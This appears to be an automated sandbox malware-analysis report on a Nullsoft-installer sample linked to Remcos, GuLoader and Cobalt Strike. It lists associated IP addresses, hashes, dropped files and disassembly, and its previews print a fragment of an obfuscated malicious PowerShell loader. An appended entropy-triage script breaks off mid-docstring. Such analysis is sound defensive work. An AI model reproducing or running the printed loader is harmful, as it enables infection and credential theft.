ATOM86-ASATOM86NL | Quotation request YN2024-10-07pdf.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | na.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | na.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | na.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | na.rtf | malicious | Remcos | 178.237.33.50
AS-COLOCROSSINGUS | beNwFiUxpf.rtf | malicious | Remcos, PureLog Stealer | 192.210.214.9
AS-COLOCROSSINGUS | C72elF4p2o.exe | malicious | RedLine, XRed | 198.12.90.244
AS-COLOCROSSINGUS | na.elf | malicious | Mirai, Gafgyt, Moobot, Okiru | 192.227.146.254
AS-COLOCROSSINGUS | invoice_45009.xls | malicious | Remcos | 192.3.101.184
AS-COLOCROSSINGUS | ls6sm8RNqn.rtf | malicious | Remcos | 107.175.130.20
AS-COLOCROSSINGUS | na.rtf | malicious | Remcos | 107.172.130.147
AS-COLOCROSSINGUS | na.rtf | malicious | Remcos | 192.210.150.29
AS-COLOCROSSINGUS | na.hta | malicious | Cobalt Strike | 107.172.130.147
AS-COLOCROSSINGUS | na.hta | malicious | Cobalt Strike, Snake Keylogger | 172.245.123.6
AS-COLOCROSSINGUS | na.hta | malicious | Cobalt Strike | 107.172.148.201
ATE-ASFR | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 185.26.107.57
ATE-ASFR | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 185.26.107.57
ATE-ASFR | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 185.26.107.57
ATE-ASFR | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 185.26.107.57
ATE-ASFR | https://forrefab.ae/ | malicious | Unknown | 185.26.107.54
                                                                          nCOg3q4a8C.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.26.107.246
                                                                          SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.26.106.244
                                                                          fQsT6cuFUj.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.26.107.246
                                                                          BiL6ODSRNK.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.26.107.246
                                                                          http://larrys474-my.sharepoint.comGet hashmaliciousUnknownBrowse
                                                                          • 185.26.107.51
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 37f463bf4616ecd445d4a1937da06e19 | Bn7LPdQA1s.exe | malicious | LummaC, Vidar | 185.26.107.57 |
|  | WiTqtf1aiE.exe | malicious | LummaC, Vidar | 185.26.107.57 |
|  | out.exe | malicious | Vidar | 185.26.107.57 |
|  | PEDIDO-144848.exe | malicious | FormBook, GuLoader | 185.26.107.57 |
|  | SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exe | malicious | Unknown | 185.26.107.57 |
|  | down.exe | malicious | Unknown | 185.26.107.57 |
|  | jre-6-windows-i586.exe | malicious | Unknown | 185.26.107.57 |
|  | transferencia.exe | malicious | FormBook, GuLoader | 185.26.107.57 |
|  | SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe | malicious | GuLoader, Snake Keylogger | 185.26.107.57 |
|  | t5985gRtZo.lnk | malicious | Unknown | 185.26.107.57 |
| No context |

Process: C:\Program Files (x86)\Windows Mail\wabmig.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013811273052389
Encrypted: false
SSDEEP: 12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 18BC6D34FABB00C1E30D98E8DAEC814A
SHA1: D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256: 862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512: 8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious: false
Reputation: moderate, very likely benign file
Preview: {. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.840877972214509
Encrypted: false
SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5: 106D01F562D751E62B702803895E93E0
SHA1: CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256: 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512: 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious: false
                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Program Files (x86)\Windows Mail\wabmig.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 15728640
Entropy (8bit): 0.10107804389042216
Encrypted: false
SSDEEP: 1536:+SB2jpSB2jFSjlK/8w/ZweshzbOlqVqvesTPDDEJeszO/ZiBl7UgM:+a6a6Uueq2e7hQB6
MD5: 3BF40487309B2C4A181496C879E9E2C3
SHA1: 623509BE165A131B221959AE04D989F7AAB8F888
SHA-256: 3DE617F12E7AD9C25712C3C80589937A9EA347896C8E68ABE211429486114EDB
SHA-512: E07E1910EE5AC0129BA359D7AF55E3D7A85E6957626D28D75441B29A92A399B803ED6E30248B4E7A7417CAFBE7DFB4ABDE45653763F615A04F60898C006B39FA
Malicious: false
                                                                          Preview:Q}J.... ...................':...{........................Q.....&....{.......{..h.S.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.....................................}.....{.6.........................{...........................#......h.S.....................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wabmig.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 648112
Entropy (8bit): 7.802900575044087
Encrypted: false
SSDEEP: 12288:UElGNmPCeBgjfiWxnlApvOvcrG7fhbL7TWxv69jIQS6lpOYCUjJ+i:5lGUPBBDulAxOErGLN7avBQTlpvCU3
MD5: 84E09BF944042FBD418724CDDB729516
SHA1: 8D908F01BE478390E49BFE51FBCA4959AF157E1F
SHA-256: 2263F87E66243B4F0D6B1BB79E0638C6556B5D89A2506AD9DB5C30CC02BBDCC3
SHA-512: 803912C31EF4E413D7B251FC400950ACA18AE522AC5A0B87D51A459182B112EDBCAD78B506A8CBE7C12EB18B5A4C2825B139107EDB7BD2DDA6BD18FE43421E78
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 47%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@..........................@............@.......................................... ..8...........(................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...p...............................rsrc...8.... ......................@..@................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
File Type: data
Category: dropped
Size (bytes): 458489
Entropy (8bit): 1.2514812815887295
Encrypted: false
SSDEEP: 1536:wPV4wdGoWBcvE3GXTAIjC+1saIdSyuPX:wPV4lBc83GjrG+5MSbP
MD5: F26A9F263418DBF8C63A41C64B26F803
SHA1: 5496DBD5B53AE6367F95B7EC436F6E2D8C5C6F92
SHA-256: E9EC9E640DE93A4632E48D142341DC8B4231DFE02D929D59394DD70CEE2D778E
SHA-512: F1CD232CAFCD9715DEBA82FAEF429DB70A7EE15F4CB8E7B50ED434F22E957527279E45A4FA56CF41FAB3E27253DBAD447585669611BA73896D928EF61966AA3F
Malicious: false
                                                                          Preview:...............v.........;......................{...............................................1.............................................................9......N.......w.......................................................................;................................................................................................................................n................................................-..............................'..%...........................................................................z........................D..................U........................!......_............?.......................9_..=..H............ni........n...............n..................................................................................zD.....|....T......................u..............8......i.......................................................................E.........U..............$....................|................................................

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
File Type: ASCII text, with very long lines (397), with no line terminators
Category: dropped
Size (bytes): 397
Entropy (8bit): 4.262943766597649
Encrypted: false
SSDEEP: 12:xTzwcVCuglUuBosmV4ig4KAjKUgwkIcUpF:xfNVCuglUWzmKHV2KUgfIhj
MD5: 55072E0E039D598FD4EC334E0E356295
SHA1: 142D468592E2DEB6E0759C8072D06D481412F426
SHA-256: 2A92F24A2EA3FE5966B686013D0AE786FB9BD20F9B7C2BF15E38047DE4CDEEDC
SHA-512: E163DDD94CC05F21A934DAFFA4B5C4B65EAB85DB5560548A2DBA8671E7E10E0682E8C2688C63905BD9789E32AF22CBE737439701898CB824A73879C996EC9B5F
Malicious: false
Preview: svndrukne bersaglieri fortaelleren resocialiserende.suzannahs prefixally extraordinarily terebellidae reduviids alphabetizer skraldgrinet,nondeadly nebulousness alpinesque arveonkels retailors trichocephaliasis.weepable rekonstrueredes kamtakket slutnumrets klemmernes bruins subarian.bolsjestribet gypper eliminerings halfcocked jalousien oater.hermandine poloskjorte skovrig teodicsws semistate,

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
File Type: data
Category: dropped
Size (bytes): 451652
Entropy (8bit): 1.2562993498096826
Encrypted: false
SSDEEP: 768:NXg64WlRZ/+czu/YTBAfwTrBJ3nZ0eDhExv1zmXMc73OscbyFqgq7mOvPrL8gkAm:RYWpYrdAKZfSuf54YzNLs4iXv
MD5: CB47D5ED57B3FF72E3FB8A8A4818434C
SHA1: FF87F921390B2654206305CDF96403D951CBC01E
SHA-256: 9C1A6D51917CB5850A0B008EFE6FDD0D883F6981C96AF7BD774ED43236C5ACA0
SHA-512: 9E6C77BD3572F3C05FC404EF12669F07496FC4B5F1BF2A586F8330E29097B4089C2A405FA632DE1FF808EC1011987077E302691D43603876B4FF436EF69532FA
Malicious: false
                                                                          Preview:......v.............................................................................(.............................................................................................;.g..............q................(.....................Y.......................................1........n....................................c.........................................|.w........B......................................e........./......H...................{K........................................................:.............N...............................................I.............t..............................................................G..w.......1........U...............................x.........................................7..................M.......P.eI....*...........Q........................................................................................................................................................................g......................................._.

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
File Type: ASCII text, with very long lines (54310), with no line terminators
Category: dropped
Size (bytes): 54310
Entropy (8bit): 5.35096851046208
Encrypted: false
SSDEEP: 768:DZrQsb0w6o1/lJcZrtDBSarR6wYFwZ89D6YVs9XFnmSFHt0NfAP3muh1oKV49qtH:msb0wVlOZrWc690l5pFmovhLL31d
MD5: 255119688C7065754A83C8AB994DF0E0
SHA1: 60D2F2B79E0FF83F5A44EDEC89B296F989EFF2BB
SHA-256: 8289EFFE39FD7A273415735AAF3DDA665C94473B7C8B698A088886AC52B4EC72
SHA-512: 0D956E851A7DDC97906B79D82C412CF1D49D7954244BF0D2A780857C1E15BE0533862D9B88CE77C9F9DAB289D6BB1EB5528FF53DC780110FC788DC2EFF4E5F04
Malicious: true
                                                                          Preview:$Subsept=$Erodibility;<#Albertine overdecorate Indolog Stningsbygningers michels Rigescent #><#Postsynchronisation Brdskrerne scribblative Anticnemion Temperatursvingningers Jiggle #><#Duumviral Calvadosernes Lovership #><#Undertoners Kabuli Antisupernaturalist #><#fierding Blabber Bdkers Brugerskarer Ringtoss Kildernes Brandbomber #><#Layered Ophjelsernes Slagtetider Mindretallenes distancering #>$Indstuderingers = "Argin; onv`$Tre iIBedsonNo cltOmplarMaledaSpi slcohanoOut ecgeneruK nful Sky aAnsttrTickerTidsidEksamkEsprenpropoiProctvv rkseDamesnstepheTakstsUnder1Pustu8Kotel9A iph=Lyrik`$DecidFMultiiXxiiid bechu Falss UndemBlaamaReliag PostebosporDrifti ,ikrsCarry;KlondfPa touFurronFysi,cE uoit Ovigi TeksostrycnAk ib K ltumHelaua RandkG aforPreseoBulgunjoges Banne( Khed`$UltraI Be inTambut Bogtr Misoauro epMealmeTn sttman giMasseoInseml.asteaFlagnrTmnin5,rwth3Siven,Ln.ry`$StopnI facinIndp.tMu,ker KonvaCyt nlChromoTamsvc Til uForb lVemodaC,ddirU der)Nonne c.ow{Halvf. tra `$RecapaUvil
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):347597
                                                                          Entropy (8bit):7.671280993169929
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Ux/SsMS3fb9lLuxAlPNuNfpM13b/VoWDzQzF03fFuTHpNr+agwq+bBi4v:y9lKrdpGL/OWDczF03fFuVd+agwq+n
                                                                          MD5:6786D85D171F0A5872E24F5AE5D403A1
                                                                          SHA1:8DD2A7E274F4AB1B278350F373ABEB6AC540DB6B
                                                                          SHA-256:7DD49BAD8787A69B6AFC1AC6DB875CB9C0DA93990D6251F45B4FF6E88FDEBB6F
                                                                          SHA-512:02C69C706292C0E098E09E8C9B975FC746145B3EDC0330BFC0656512B250016AAC0DEB49501416DAB6CD0B79E927CD36FD0699A48AB90F67221097F7C38E86E1
                                                                          Malicious:false
                                                                          Preview:........d.......................x.bb....BB..bbb...............22...y..................................................................R........F.........]]........A......m.............................8..0....................LL......... .....{{{.....f..............:.....................99..e...I...d.."....www........................rrr.........j......ff....Q.................4...........................G.^^^....KK...L.........u......CCC.............^.........B.............MMMMM..MM.............uuu......Y...........MM.##.I..............%..............B.....==.......???.............###...........X.$$.Y.;;;.........+++....................vvvvv.MMM.i.a..``.K...T.h......V.................................&..l.......|......................................))...2..__..E./. .{{{{....:.........".j.....h..LLL.{................v..........._____../........*......................r.g............,,.......vv.....".....]......=.....ff.t.G.n....z.................PP...........;;;;;;;...................MMMMM
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):321416
                                                                          Entropy (8bit):1.252228082377907
                                                                          Encrypted:false
                                                                          SSDEEP:768:p4+c29AI3CPQXNEXt6QsTC3tMB/e0Vg+tlTf/Twl/1f1FNCnu2OaFf7YTYxX4taF:pdfAkTprVQp9SVFjOqvpmwN
                                                                          MD5:8836F785C1EB3F273C58CBF8C32D1D09
                                                                          SHA1:2BC2DA2E22A104F0FF30E1DD2A62E72246419608
                                                                          SHA-256:91C0B19CC1A646E9F22A0C73EFA9DDF4B1C0B1DCD18D59960CF41AF9852050F7
                                                                          SHA-512:2B78178D33F87E81FCAE76CE176C23C89AD78FC77012264D27A292365F183CEDB6008A480E33CB151F57E61C17969EF49BE87122DC694481653E70102714EA0A
                                                                          Malicious:false
                                                                          Preview:.7....................w............................................................q...................]..............E.........a...a..............>...................................h.........................................K.......a....D.....................U..0..........c......."........a................)..................................................u................................................................K..3.............................o........O...............z.......................s......................*......s....x........................8............d........................................................................................................................N.............x.....z..I....R......................Z......i.........C...R.........J...............................................g..............H...................................h......................e.................................E................................l............................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.802900575044087
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File size:648'112 bytes
                                                                          MD5:84e09bf944042fbd418724cddb729516
                                                                          SHA1:8d908f01be478390e49bfe51fbca4959af157e1f
                                                                          SHA256:2263f87e66243b4f0d6b1bb79e0638c6556b5d89a2506ad9db5c30cc02bbdcc3
                                                                          SHA512:803912c31ef4e413d7b251fc400950aca18ae522ac5a0b87d51a459182b112edbcad78b506a8cbe7c12eb18b5a4c2825b139107edb7bd2dda6bd18fe43421e78
                                                                          SSDEEP:12288:UElGNmPCeBgjfiWxnlApvOvcrG7fhbL7TWxv69jIQS6lpOYCUjJ+i:5lGUPBBDulAxOErGLN7avBQTlpvCU3
                                                                          TLSH:39D402A0F290D8DFE89627B14C6DDC2115A76A4D94B0561F31967B2D7EF338310ABA0F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....
                                                                          Icon Hash:6be6a4acc5ce5a6b
                                                                          Entrypoint:0x40333d
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                          Signature Valid:false
                                                                          Signature Issuer:CN="Quadrantid Beslutsomste Troskyldigere ", O=Bizardite, L=Lustar, S=Occitanie, C=FR
                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                          Error Number:-2146762487
                                                                           Not Before:05/02/2024 11:13:41
                                                                           Not After:04/02/2027 11:13:41
                                                                          Subject Chain
                                                                          • CN="Quadrantid Beslutsomste Troskyldigere ", O=Bizardite, L=Lustar, S=Occitanie, C=FR
                                                                          Version:3
                                                                          Thumbprint MD5:006B7E3BAB2FC2862498F3C222F9A46C
                                                                          Thumbprint SHA-1:71B05D99C057481D036101FEA868635A56E13D3F
                                                                          Thumbprint SHA-256:CADCD1A1EA7418D62DFDA0F637C2782B3853AC02220E905F66DD3BB02A750F7C
                                                                          Serial:019D04BD639206BBB1DA18FE33181036279A8653
                                                                          Instruction
                                                                          sub esp, 000002D4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+14h], ebx
                                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                                          mov dword ptr [esp+1Ch], ebx
                                                                          call dword ptr [004080A8h]
                                                                          call dword ptr [004080A4h]
                                                                          and eax, BFFFFFFFh
                                                                          cmp ax, 00000006h
                                                                          mov dword ptr [0042A20Ch], eax
                                                                          je 00007F8F8CE590E3h
                                                                          push ebx
                                                                          call 00007F8F8CE5C379h
                                                                          cmp eax, ebx
                                                                          je 00007F8F8CE590D9h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 004082B0h
                                                                          push esi
                                                                          call 00007F8F8CE5C2F3h
                                                                          push esi
                                                                          call dword ptr [00408150h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], 00000000h
                                                                          jne 00007F8F8CE590BCh
                                                                          push 0000000Ah
                                                                          call 00007F8F8CE5C34Ch
                                                                          push 00000008h
                                                                          call 00007F8F8CE5C345h
                                                                          push 00000006h
                                                                          mov dword ptr [0042A204h], eax
                                                                          call 00007F8F8CE5C339h
                                                                          cmp eax, ebx
                                                                          je 00007F8F8CE590E1h
                                                                          push 0000001Eh
                                                                          call eax
                                                                          test eax, eax
                                                                          je 00007F8F8CE590D9h
                                                                          or byte ptr [0042A20Fh], 00000040h
                                                                          push ebp
                                                                          call dword ptr [00408044h]
                                                                          push ebx
                                                                          call dword ptr [004082A0h]
                                                                          mov dword ptr [0042A2D8h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push 000002B4h
                                                                          push eax
                                                                          push ebx
                                                                          push 004216A8h
                                                                          call dword ptr [00408188h]
                                                                          push 0040A2C8h
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                           Name | Virtual Address | Virtual Size | Is in Section
                                                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x11338 | .rsrc
                                                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9da28 | 0x988 |
                                                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                           .text | 0x1000 | 0x626d | 0x6400 | b2dd5d917f94d75528a11411abe5681c | False | 0.6569921875 | data | 6.423132440637118 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                           .rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                           .data | 0xa000 | 0x20318 | 0x600 | c46c24ddc9bf88a6774bd207204164b9 | False | 0.4921875 | data | 3.906531854842304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                           .ndata | 0x2b000 | 0x37000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                           .rsrc | 0x62000 | 0x11338 | 0x11400 | dcd2ec831c118d47b41581faab667a73 | False | 0.21158854166666666 | data | 4.256146131264858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
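The Entropy column in the section table above, like the "Entropy (8bit)" values the report gives for the sample (7.80) and its dropped files (7.67 and 1.25), is Shannon entropy in bits per byte. The script below is an added example, not Joe Sandbox code: it computes that figure and applies the rule-of-thumb thresholds an analyst reads a section table with. The section contents it runs on (SAMPLE_SECTIONS) are constructed stand-ins chosen for their known entropies, not bytes from the analysed binary, and the threshold values are the author's heuristics, not anything the report defines.

```python
"""Shannon entropy triage for PE sections and dropped files.

Added example (not Joe Sandbox code): reproduces the "Entropy (8bit)" figure
the report prints for the sample, its dropped files and each PE section, and
applies the thresholds an analyst reads a section table with. The byte
strings under SAMPLE_SECTIONS are constructed stand-ins, not bytes from the
analysed binary.
"""
import math
from collections import Counter
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(entropy: float, raw_size: int) -> str:
    """Triage verdict for one section or blob (heuristic thresholds, author's choice).

    A zero raw size with a non-zero virtual size is an uninitialised section
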